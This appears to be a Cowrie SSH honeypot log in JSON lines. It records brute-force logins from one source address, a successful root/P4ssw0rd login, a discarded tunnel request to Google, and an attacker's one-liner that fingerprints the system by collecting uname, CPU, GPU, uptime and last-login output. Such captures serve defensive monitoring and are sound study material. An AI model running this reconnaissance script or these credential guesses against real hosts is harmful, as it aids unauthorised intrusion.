{"eventid":"cowrie.direct-tcpip.request","dst_ip":"142.251.208.164","dst_port":443,"src_ip":"212.227.235.229","src_port":43640,"message":"direct-tcp connection request to 142.251.208.164:443 from 127.0.0.1:43640","sensor":"my-vps","timestamp":"2025-08-26T21:11:52.417300Z","session":"d585cace115e"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"142.251.208.164","dst_port":443,"data":"b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x04;\\xde<\\x7f\\xf8j\\xe4V\\x00C\\x01z\\x0f\\xc5x\\x17\\xa2\\xfb\\x02$\\x97\\xe8\\xac\\xf2\\xc8\\xdbQ\\x1a\\x97\\x9bH \"\\xaf5\"\\xf5\\xa8\\xc5rulR\\n\\x16\\xe0X+AsJ?\\xb6\\xbd<\\xfbc{\\x02\\xb0~\\x81\\x1a\\x95\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 UO\\xe7d\\xf40\\xb0\\x94\\xca\\xd7o|\\xbc\\xaf\\xc6\\xdaM\\x08\\x18P|\\x02\\t\\x7f\\x02\\xee\\xbf\\xd9\\xe2\\xdd+9\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","id":2,"message":"discarded direct-tcp forward request 2 to 142.251.208.164:443 with data b'\\x16\\x03\\x01\\x02\\x00\\x01\\x00\\x01\\xfc\\x03\\x03\\x04;\\xde<\\x7f\\xf8j\\xe4V\\x00C\\x01z\\x0f\\xc5x\\x17\\xa2\\xfb\\x02$\\x97\\xe8\\xac\\xf2\\xc8\\xdbQ\\x1a\\x97\\x9bH \"\\xaf5\"\\xf5\\xa8\\xc5rulR\\n\\x16\\xe0X+AsJ?\\xb6\\xbd<\\xfbc{\\x02\\xb0~\\x81\\x1a\\x95\\x00V\\x13\\x02\\x13\\x03\\x13\\x01\\xc0,\\xc00\\xc0+\\xc0/\\xcc\\xa9\\xcc\\xa8\\x00\\x9f\\x00\\x9e\\xcc\\xaa\\xc0\\xaf\\xc0\\xad\\xc0\\xae\\xc0\\xac\\xc0$\\xc0(\\xc0#\\xc0\\'\\xc0\\n\\xc0\\x14\\xc0\\t\\xc0\\x13\\xc0\\xa3\\xc0\\x9f\\xc0\\xa2\\xc0\\x9e\\x00k\\x00g\\x009\\x003\\x00\\x9d\\x00\\x9c\\xc0\\xa1\\xc0\\x9d\\xc0\\xa0\\xc0\\x9c\\x00=\\x00<\\x005\\x00/\\x00\\xff\\x01\\x00\\x01]\\x00\\x00\\x00\\x13\\x00\\x11\\x00\\x00\\x0ewww.google.com\\x00\\x0b\\x00\\x04\\x03\\x00\\x01\\x02\\x00\\n\\x00\\x0c\\x00\\n\\x00\\x1d\\x00\\x17\\x00\\x1e\\x00\\x19\\x00\\x18\\x00\\x10\\x00\\x0b\\x00\\t\\x08http/1.1\\x00\\x16\\x00\\x00\\x00\\x17\\x00\\x00\\x001\\x00\\x00\\x00\\r\\x00*\\x00(\\x04\\x03\\x05\\x03\\x06\\x03\\x08\\x07\\x08\\x08\\x08\\t\\x08\\n\\x08\\x0b\\x08\\x04\\x08\\x05\\x08\\x06\\x04\\x01\\x05\\x01\\x06\\x01\\x03\\x03\\x03\\x01\\x03\\x02\\x04\\x02\\x05\\x02\\x06\\x02\\x00+\\x00\\x05\\x04\\x03\\x04\\x03\\x03\\x00-\\x00\\x02\\x01\\x01\\x003\\x00&\\x00$\\x00\\x1d\\x00 UO\\xe7d\\xf40\\xb0\\x94\\xca\\xd7o|\\xbc\\xaf\\xc6\\xdaM\\x08\\x18P|\\x02\\t\\x7f\\x02\\xee\\xbf\\xd9\\xe2\\xdd+9\\x00\\x15\\x00\\xa8\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00'","sensor":"my-vps","timestamp":"2025-08-26T21:11:53.833285Z","src_ip":"212.227.235.229","session":"d585cace115e"}
{"eventid":"cowrie.session.closed","duration":"26.6","message":"Connection lost after 26.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:11:54.028117Z","src_ip":"212.227.235.229","session":"d585cace115e"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:11:54.440657Z","src_ip":"212.227.235.229","session":"7ec2110c3e8a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55520,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ad5b911de0a","protocol":"ssh","message":"New connection: 212.227.235.229:55520 (1.2.3.4:22) [session: 0ad5b911de0a]","sensor":"my-vps","timestamp":"2025-08-26T21:12:02.409828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:12:02.663887Z","src_ip":"212.227.235.229","session":"0ad5b911de0a"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:12:02.733343Z","src_ip":"212.227.235.229","session":"0ad5b911de0a"}
{"eventid":"cowrie.login.failed","username":"joggler","password":"joggler","message":"login attempt [joggler/joggler] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:05.620986Z","src_ip":"212.227.235.229","session":"0ad5b911de0a"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:07.161767Z","src_ip":"212.227.235.229","session":"0ad5b911de0a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39202,"dst_ip":"1.2.3.4","dst_port":22,"session":"0558fe6354f7","protocol":"ssh","message":"New connection: 212.227.235.229:39202 (1.2.3.4:22) [session: 0558fe6354f7]","sensor":"my-vps","timestamp":"2025-08-26T21:12:15.146185Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T21:12:15.330839Z","src_ip":"212.227.235.229","session":"0558fe6354f7"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T21:12:15.403046Z","src_ip":"212.227.235.229","session":"0558fe6354f7"}
{"eventid":"cowrie.login.failed","username":"cf1c22","password":"cf1c22","message":"login attempt [cf1c22/cf1c22] failed","sensor":"my-vps","timestamp":"2025-08-26T21:12:16.777527Z","src_ip":"212.227.235.229","session":"0558fe6354f7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:18.041352Z","src_ip":"176.65.149.186","session":"7e7251b8d3e2"}
{"eventid":"cowrie.session.closed","duration":180.11883187294006,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:18.045885Z","src_ip":"176.65.149.186","session":"7e7251b8d3e2"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T21:12:18.209279Z","src_ip":"212.227.235.229","session":"0558fe6354f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57176,"dst_ip":"1.2.3.4","dst_port":22,"session":"4fdfea3ac839","protocol":"ssh","message":"New connection: 212.227.235.229:57176 (1.2.3.4:22) [session: 4fdfea3ac839]","sensor":"my-vps","timestamp":"2025-08-26T21:12:24.066594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T21:12:25.332555Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T21:12:25.333461Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.login.success","username":"root","password":"P4ssw0rd","message":"login attempt [root/P4ssw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T21:12:31.878432Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T21:12:35.417993Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.418673Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.419313Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.420550Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.421705Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.422371Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.423178Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.424435Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.424840Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.425553Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.426077Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.426720Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T21:12:35.427316Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T21:12:36.647007Z","src_ip":"212.227.235.229","session":"4fdfea3ac839"}
